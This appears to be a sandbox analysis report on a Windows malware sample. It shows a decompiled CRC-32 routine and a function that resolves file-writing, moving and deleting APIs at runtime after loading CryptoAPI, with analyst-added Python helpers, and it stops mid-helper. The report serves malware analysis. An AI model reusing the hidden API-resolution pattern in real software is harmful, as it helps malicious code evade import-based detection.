*(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) 
& 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  
*_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 
>> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008 ^  *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 
0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 
0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t78[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) 
* 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 
0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 
0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t79[1] & 0x000000ff) * 4);
            							_t73 =  &(_t79[2]);
            							_t85 = _t85 - 1;
            						} while (_t85 != 0);
            					}
            					if(_a12 != 0) {
            						do {
            							_t35 = _t35 >> 0x00000008 ^  *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4);
            							_t73 =  &(_t73[1]);
            							_t32 =  &_a12;
            							 *_t32 = _a12 - 1;
            						} while ( *_t32 != 0);
            					}
            					return  !_t35;
            				} else {
            					return 0;
            				}
            			}
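The routine above has the shape of zlib's table-driven crc32(): an early `return 0` for a null buffer, a main loop that consumes eight bytes per iteration (the `_t85` counter) with the repeated step `table[(crc ^ byte) & 0xff] ^ (crc >> 8)` against the 4-byte-stride table at 0x40d054, a byte-wise tail loop (the `_a12` counter), and a closing `return !_t35`, which reads as the final bitwise complement. The following is an added illustration written for this report, not code recovered from the sample; it lays out the same structure in Python and cross-checks it against the standard library so an analyst can confirm the table and constants match the reflected CRC-32 used by zlib and the ZIP format.

```python
"""Table-driven CRC-32 with the shape of the decompiled routine above.

Added illustration, written for this report; it is not code recovered from
the sample. The structure (null-buffer early return, 8-byte unrolled main
loop, byte-wise tail loop, complement on entry and exit) is the one zlib's
crc32() uses, which is what the decompiled listing appears to be.
"""
import zlib

# Reflected CRC-32 polynomial (IEEE 802.3), as used by zlib and the ZIP format.
POLY = 0xEDB88320


def make_table():
    """Build the 256-entry lookup table; the sample's equivalent is the
    4-byte-stride table the listing indexes at 0x40d054."""
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ POLY if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = make_table()


def _do1(crc, byte):
    # One table step, the expression repeated throughout the listing:
    # table[(crc ^ byte) & 0xff] ^ (crc >> 8)
    return TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)


def crc32_update(crc, buf):
    """CRC-32 of buf continued from crc (pass 0 for a fresh computation)."""
    if buf is None:              # the listing's `return 0` branch
        return 0
    crc ^= 0xFFFFFFFF            # complement on entry
    i, n = 0, len(buf)
    for _ in range(n >> 3):      # unrolled main loop, len/8 iterations (_t85)
        for k in range(8):
            crc = _do1(crc, buf[i + k])
        i += 8
    for k in range(i, n):        # byte-wise tail loop (_a12)
        crc = _do1(crc, buf[k])
    return crc ^ 0xFFFFFFFF      # complement on exit (the listing's `!_t35`)


def matches_zlib(buf):
    """Cross-check against the standard library implementation."""
    return crc32_update(0, buf) == zlib.crc32(buf)
```

Because the complement is applied on entry and undone on exit, the function can be called incrementally with the previous result as `crc`, the same calling convention zlib uses; `crc32_update(0, b"123456789")` yields the standard check value 0xCBF43926.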
            0x00405422
            0x00405427
            0x00405436
            0x0040543d
            0x00405447
            0x0040544a
            0x0040544f
            0x00405465
            0x0040547f
            0x00405496
            0x004054ad
            0x004054c4
            0x004054db
            0x00405503
            0x00405505
            0x00405506
            0x00405506
            0x0040550d
            0x00405512
            0x00405514
            0x00405527
            0x00405529
            0x0040552a
            0x0040552a
            0x0040552a
            0x00405514
            0x00405534
            0x00405429
            0x0040542c
            0x0040542c

            Memory Dump Source
            • Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmp
            • Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmp
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
            • Instruction ID: 3f72058ef88e406f14a8e4c5cd972b2546dbbe82ce95f55f9558457d0f17cbf0
            • Opcode Fuzzy Hash: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
            • Instruction Fuzzy Hash: 8E31A133E285B207C3249EBA5C4006AF6D2AB4A125B4A8775DE88F7355E128EC96C6D4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040170A() {
            				void* _t3;
            				_Unknown_base(*)()* _t11;
            				struct HINSTANCE__* _t13;
            				intOrPtr _t18;
            				intOrPtr _t20;
            				intOrPtr _t21;
            				intOrPtr _t22;
            				intOrPtr _t23;
            				intOrPtr _t24;
            				intOrPtr _t25;
            
            				if(E00401A45() == 0) {
            					L11:
            					return 0;
            				}
            				_t18 =  *0x40f878; // 0x0
            				if(_t18 != 0) {
            					L10:
            					_t3 = 1;
            					return _t3;
            				}
            				_t13 = LoadLibraryA("kernel32.dll");
            				if(_t13 == 0) {
            					goto L11;
            				}
            				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
            				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
            				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
            				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
            				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
            				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
            				_t11 = GetProcAddress(_t13, "CloseHandle");
            				_t20 =  *0x40f878; // 0x0
            				 *0x40f890 = _t11;
            				if(_t20 == 0) {
            					goto L11;
            				}
            				_t21 =  *0x40f87c; // 0x0
            				if(_t21 == 0) {
            					goto L11;
            				}
            				_t22 =  *0x40f880; // 0x0
            				if(_t22 == 0) {
            					goto L11;
            				}
            				_t23 =  *0x40f884; // 0x0
            				if(_t23 == 0) {
            					goto L11;
            				}
            				_t24 =  *0x40f888; // 0x0
            				if(_t24 == 0) {
            					goto L11;
            				}
            				_t25 =  *0x40f88c; // 0x0
            				if(_t25 == 0 || _t11 == 0) {
            					goto L11;
            				} else {
            					goto L10;
            				}
            			}
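E0040170A resolves its file APIs at runtime: after the subcall E00401A45 has loaded advapi32.dll and fetched the CryptoAPI entry points, it loads kernel32.dll, stores the GetProcAddress results for CreateFileW, WriteFile, ReadFile, MoveFileW, MoveFileExW, DeleteFileW and CloseHandle in globals at 0x40f878..0x40f890, and returns 0 if any lookup failed. Because these names never appear in the import table, a static import scan misses them; they are only visible as strings. The following is an added triage helper written for this report, not code from the sample: it scans a memory-dump excerpt for the API names the report lists and separates the ones present only as strings from the ones the import table already declares. The `.rdata`-style excerpt and the import list are constructed.

```python
"""Triage helper for the runtime API resolution shown in E0040170A / E00401A45.

Added illustration, not code from the sample. It scans a memory-dump excerpt
for the API names the report lists, and separates the ones that are only
present as strings (resolved via GetProcAddress) from the ones the import
table already declares. The excerpt and import list below are constructed.
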